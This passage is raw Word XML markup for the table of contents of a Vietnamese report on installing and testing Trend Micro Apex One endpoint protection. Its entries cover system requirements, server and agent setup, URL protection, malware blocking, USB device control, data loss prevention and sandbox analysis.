          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795828 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="641A6C8F" w14:textId="6F53E841"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9" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>c.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Memory:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795829 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64C3976B" w14:textId="4532F9D8"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30" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>d.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Disk space:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795830 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E94CC2C" w14:textId="715F8DEC"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1" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>3)</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 xml:space="preserve">Thành phần </w:t>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>liên kết hỗ trợ</w:t>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Apex One</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795831 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D6987D4" w14:textId="6C4A7FF3"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2" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>4)</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bCs/>
            <w:noProof/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t xml:space="preserve">Các </w:t>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>chức năng chính của Apex One</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795832 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="048CB3AD" w14:textId="1571E314" w:rsidR="00DC4306" w:rsidRDefault="00DC4306">
      <w:pPr>
        <w:pStyle w:val="TOC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2795833" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>II.</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Cài đặt Trend Micro Apex One Server và Agent</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795833 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24D59771" w14:textId="0AE9AB1B"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4" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>1)</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 xml:space="preserve">Tạo tài khoản và đăng ký dịch vụ Trend Micro Apex </w:t>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>One:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795834 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="311F883E" w14:textId="1998E187"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5" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>2)</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Setup Trend Micro Apex One as a Services (Apex One SaaS) server</w:t>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795835 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21BA8339" w14:textId="2ED047A8"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6" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>3)</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Setup Agent</w:t>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795836 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B48ED3D" w14:textId="17267F9E"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7" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>4)</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bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Một số chức năng cơ bản:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795837 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07C1F43C" w14:textId="3662E867" w:rsidR="00DC4306" w:rsidRDefault="00DC4306">
      <w:pPr>
        <w:pStyle w:val="TOC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2795838" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>III.</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Thử Nghiệm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795838 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36C368AE" w14:textId="77A20877"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9" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>1)</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Bảo vệ URL</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795839 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0193AE9C" w14:textId="0E0988C5"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40" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>a)</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bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Giới thiệu</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795840 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="199E5085" w14:textId="43632451"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41" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>b)</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bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hướng dẫn cài đặt</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795841 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6983BA7C" w14:textId="1F101048"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2" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>2)</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Phát hiện và ngăn chặn malware – có sẵn trên thiết bị EndPoint</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795842 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D9606EA" w14:textId="22E98083"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3" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>3)</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Phát hiện và ngăn chặn malware – tấn công từ bên ngoài</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795843 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F943BAF" w14:textId="10D70C9E"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4" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>4)</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Ngăn</w:t>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:noProof/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t xml:space="preserve"> chặn các cuộc tấn công từ thiết bị lưu trữ ngoài</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795844 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74C2B25D" w14:textId="4D73B964"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5" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>5)</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Ngăn chặn mất mát dữ liệu (Data Loss Prevention)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795845 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C419B7C" w14:textId="5FBDDBC1"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6" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>6)</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bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Phân tích bằng Sandbox trong Trend Micro Vision One (mở rộng)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
